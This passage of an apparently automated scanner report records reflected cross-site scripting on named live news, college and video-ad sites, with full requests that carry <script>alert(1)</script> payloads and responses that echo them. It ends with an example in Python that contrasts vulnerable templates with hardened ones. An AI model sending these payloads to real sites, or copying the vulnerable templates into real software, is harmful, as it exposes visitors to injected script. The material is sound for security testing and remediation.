Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:13 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:13 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24745

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/sales/?42536'><script>alert(1)</script>808b664d1ae=1'>
...[SNIP]...

4.841. http://www.cbs6albany.com/sections/satellitewaivers/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/satellitewaivers/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 61465'><script>alert(1)</script>a06280160d2 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/satellitewaivers/?61465'><script>alert(1)</script>a06280160d2=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:31:52 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:41:52 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42328


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/satellitewaivers/?61465'><script>alert(1)</script>a06280160d2=1'>
...[SNIP]...

4.842. http://www.cbs6albany.com/sections/schoolclosures/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/schoolclosures/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload c4351'><script>alert(1)</script>5e3380a0e97 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/schoolclosures/?c4351'><script>alert(1)</script>5e3380a0e97=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:04 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:04 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 37839

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/schoolclosures/?c4351'><script>alert(1)</script>5e3380a0e97=1'>
...[SNIP]...

4.843. http://www.cbs6albany.com/sections/sitemap/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/sitemap/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload adc57'><script>alert(1)</script>d7b9d0c4880 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/sitemap/?adc57'><script>alert(1)</script>d7b9d0c4880=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:27:56 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:37:56 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 40061

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/sitemap/?adc57'><script>alert(1)</script>d7b9d0c4880=1'>
...[SNIP]...

4.844. http://www.cbs6albany.com/sections/sp-alerts/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/sp-alerts/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload e11ed'><script>alert(1)</script>5063f0c5775 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/sp-alerts/?e11ed'><script>alert(1)</script>5063f0c5775=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:36 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:36 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 37078

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/sp-alerts/?e11ed'><script>alert(1)</script>5063f0c5775=1'>
...[SNIP]...

4.845. http://www.cbs6albany.com/sections/thirdParty/iframe_header/ [taxonomy parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/thirdParty/iframe_header/

Issue detail

The value of the taxonomy request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2c6a0'%3balert(1)//11741c449be was submitted in the taxonomy parameter. This input was echoed as 2c6a0';alert(1)//11741c449be in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /sections/thirdParty/iframe_header/?domain=events.cbs6albany.com&cname=zvents&shier=entertainment&ghier=entertainment%7Cevents%7Cevents%7Cevent&taxonomy=entertainment2c6a0'%3balert(1)//11741c449be&trackstats=no HTTP/1.1
Host: www.cbs6albany.com
Proxy-Connection: keep-alive
Referer: http://events.cbs6albany.com/?376e5%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea7771aeaee3=1
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SC_LINKS=%5B%5BB%5D%5D; s_vnum=1298828234584%26vn%3D1; s_invisit=true; c_m=NoneDirect%20LoadDirect%20Load; cf=1; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_w=1296367200803%26vn%3D1; sinvisit_w=true; s_vnum_m=1296540000804%26vn%3D1; sinvisit_m=true; s_sq=%5B%5BB%5D%5D

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 01:42:09 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 01:52:09 GMT
Vary: Accept-Encoding,User-Agent
Content-Type: text/html
Content-Length: 5696

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<script type='text/javascript'>var freedom = new DartAds({domain: 'fbi.wrgb.cbs6albany',taxonomy: 'entertainment2c6a0';alert(1)//11741c449be',ref: 'cbs6albany.com',kw: '',extra: '',test: '',positions: 'Top' });
</script>
...[SNIP]...

4.846. http://www.cbs6albany.com/sections/traffic-events/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/traffic-events/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload ccbfe'><script>alert(1)</script>5970f590b45 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/traffic-events/?ccbfe'><script>alert(1)</script>5970f590b45=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:01 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:01 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42040


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/traffic-events/?ccbfe'><script>alert(1)</script>5970f590b45=1'>
...[SNIP]...

4.847. http://www.cbs6albany.com/sections/traffic/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/traffic/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 60e3e'><script>alert(1)</script>147cbe0ed3a was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/traffic/?60e3e'><script>alert(1)</script>147cbe0ed3a=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:22 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:22 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 28936

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/traffic/?60e3e'><script>alert(1)</script>147cbe0ed3a=1'>
...[SNIP]...

4.848. http://www.cbs6albany.com/sections/tvlistings/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/tvlistings/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 18fdb'><script>alert(1)</script>ea31e14ecf8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/tvlistings/?18fdb'><script>alert(1)</script>ea31e14ecf8=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:27:07 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:37:07 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 23684

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/tvlistings/?18fdb'><script>alert(1)</script>ea31e14ecf8=1'>
...[SNIP]...

4.849. http://www.cbs6albany.com/sections/videocopies/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/videocopies/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 5e7b0'><script>alert(1)</script>20ab6d60dc4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/videocopies/?5e7b0'><script>alert(1)</script>20ab6d60dc4=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:30:19 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:40:19 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 42233


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/videocopies/?5e7b0'><script>alert(1)</script>20ab6d60dc4=1'>
...[SNIP]...

4.850. http://www.cbs6albany.com/sections/weather/7day/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/weather/7day/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 546eb'><script>alert(1)</script>a6747eb34cf was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/weather/7day/?546eb'><script>alert(1)</script>a6747eb34cf=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:27:20 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:37:20 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 24633

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/weather/7day/?546eb'><script>alert(1)</script>a6747eb34cf=1'>
...[SNIP]...

4.851. http://www.cbs6albany.com/sections/web-links/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/web-links/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 7fb2a'><script>alert(1)</script>adf56b952dc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/web-links/?7fb2a'><script>alert(1)</script>adf56b952dc=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:28:22 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:38:22 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 59509


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>
...[SNIP]...
<a href='/sections/web-links/?7fb2a'><script>alert(1)</script>adf56b952dc=1'>
...[SNIP]...

4.852. http://www.cbs6albany.com/sections/wrgb-talent/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.cbs6albany.com
Path:   /sections/wrgb-talent/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload 1abcc'><script>alert(1)</script>d146c5acfd8 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /sections/wrgb-talent/?1abcc'><script>alert(1)</script>d146c5acfd8=1 HTTP/1.1
Host: www.cbs6albany.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: s_vnum_w=1296367200803%26vn%3D1; c_m=NoneDirect%20LoadDirect%20Load; sinvisit_w=true; s_sq=%5B%5BB%5D%5D; sinvisit_m=true; s_vnum=1298828234584%26vn%3D1; s_invisit=true; s_cc=true; s_lastvisit=1296236234801; s_nr=1296236234802; SC_LINKS=%5B%5BB%5D%5D; cf=1; fi_dslv=First%20page%20view%20or%20cookies%20not%20supported; s_vnum_m=1296540000804%26vn%3D1;

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:29:16 GMT
Server: Apache
Cache-Control: max-age=600
Expires: Sat, 29 Jan 2011 04:39:16 GMT
Vary: Accept-Encoding,User-Agent
Connection: close
Content-Type: text/html
Content-Length: 27008

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" lang="en" xml:lang="en">
<head>

...[SNIP]...
<a href='/sections/wrgb-talent/?1abcc'><script>alert(1)</script>d146c5acfd8=1'>
...[SNIP]...

4.853. http://www.collegeanduniversity.net/herald/ [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.collegeanduniversity.net
Path:   /herald/

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1bc02"><script>alert(1)</script>f6e0bec01de was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /herald/?1bc02"><script>alert(1)</script>f6e0bec01de=1 HTTP/1.1
Host: www.collegeanduniversity.net
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Sat, 29 Jan 2011 04:30:35 GMT
Server: Apache
Set-Cookie: CFID=23963352;expires=Mon, 21-Jan-2041 04:30:36 GMT;path=/
Set-Cookie: CFTOKEN=d929d8f4b82db578-D009724A-19B9-F336-D8F485B26C5987DC;expires=Mon, 21-Jan-2041 04:30:36 GMT;path=/
Set-Cookie: JSESSIONID=22306a9c07e3ea57fd98291165c132d6aa47;path=/
Set-Cookie: CUNET.SHOWDEBUG=0;path=/
Set-Cookie: CU2005FRONTAPPKEY.SHOWDEBUG=0;path=/
Set-Cookie: CID=175;expires=Mon, 21-Jan-2041 04:30:36 GMT;path=/
P3P: CP='ADMa DEVa OUR IND DSP NON COR'
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 28431

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html>
<head>
<title>Find Online College Degrees - Top Online Universities at Collegeanduniversity.net</title>
<meta name="Descriptio
...[SNIP]...
<input type="hidden" name="ReturnURL" value="/herald/index.cfm?1bc02"><script>alert(1)</script>f6e0bec01de=1">
...[SNIP]...

4.854. http://www.mixpo.com/videoad/kD3_P_IRSdu0NijksWoruw/Chevrolet-LMA [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.mixpo.com
Path:   /videoad/kD3_P_IRSdu0NijksWoruw/Chevrolet-LMA

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload b1c9a<script>alert(1)</script>3ef0ba5983c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. Note that the reflection is in a 400 Bad Request response: browsers render the body of an error response as ordinary HTML, so the status code does not stop the injected script from executing.

Request

GET /videoad/kD3_P_IRSdu0NijksWoruwb1c9a<script>alert(1)</script>3ef0ba5983c/Chevrolet-LMA HTTP/1.1
Host: www.mixpo.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 400 Bad Request
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Date: Sat, 29 Jan 2011 04:37:23 GMT
Connection: close


<!DOCTYPE html>
<html>
<head>
   <title>Mixpo: Online VideoAds that Drive Response </title>
   <link rel="SHORTCUT ICON" href="/favicon.ico" type="image/x-icon" />
   <meta name="description" content=" Ma
...[SNIP]...
<p>Landing page, cannot find container for /videoad/kD3_P_IRSdu0NijksWoruwb1c9a<script>alert(1)</script>3ef0ba5983c/Chevrolet-LMA</p>
...[SNIP]...
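Findings 4.845 through 4.853 all copy the raw query string, including the name of a parameter the application does not know, into a quoted href, and 4.854 copies the request path into a text node of an error page. The Python below is an added example and is not code from the scanner or from any of the sites in this report: it shows each vulnerable template beside a hardened one and checks the result by running the markup through the standard library's HTML tokenizer, which sees tags the way a browser's tokenizer does. The markers are copied from 4.847 and 4.854; the template strings, function names and the `/sections/traffic/` path passed in the usage are assumptions.

```python
import html
from html.parser import HTMLParser
from urllib.parse import parse_qsl, urlencode

# Markers copied from findings 4.847 and 4.854; the templates below are assumptions
ATTR_PAYLOAD = "60e3e'><script>alert(1)</script>147cbe0ed3a=1"
TEXT_PAYLOAD = "/videoad/kD3_P_IRSdu0NijksWoruwb1c9a<script>alert(1)</script>3ef0ba5983c/Chevrolet-LMA"


def self_link_vulnerable(path, raw_query):
    """4.845-4.853: the raw query string is copied into a quoted href."""
    return f"<a href='{path}?{raw_query}'>"


def self_link_hardened(path, raw_query):
    """Re-serialise the query so names and values are percent-encoded, then
    attribute-encode the whole URL (quote=True covers both ' and ")."""
    pairs = parse_qsl(raw_query, keep_blank_values=True)
    url = path + "?" + urlencode(pairs) if pairs else path
    return f"<a href='{html.escape(url, quote=True)}'>"


def error_text_vulnerable(requested_path):
    """4.854: the requested path is copied into a text node of an error page."""
    return f"<p>Landing page, cannot find container for {requested_path}</p>"


def error_text_hardened(requested_path):
    """Text-node context: entity-encode < > & before writing the value out."""
    return f"<p>Landing page, cannot find container for {html.escape(requested_path)}</p>"


class _TagCollector(HTMLParser):
    """Records every start tag the tokenizer emits and the first <a> element's attributes."""

    def __init__(self):
        super().__init__()
        self.tags = []
        self.link_attrs = {}

    def handle_starttag(self, tag, attrs):
        self.tags.append(tag)
        if tag == "a" and not self.link_attrs:
            self.link_attrs = dict(attrs)


def parse_markup(markup):
    p = _TagCollector()
    p.feed(markup)
    p.close()
    return p


def breaks_out(markup):
    """True if the tokenizer sees a <script> start tag, i.e. the reflection escaped its context."""
    return "script" in parse_markup(markup).tags


def href_params(markup):
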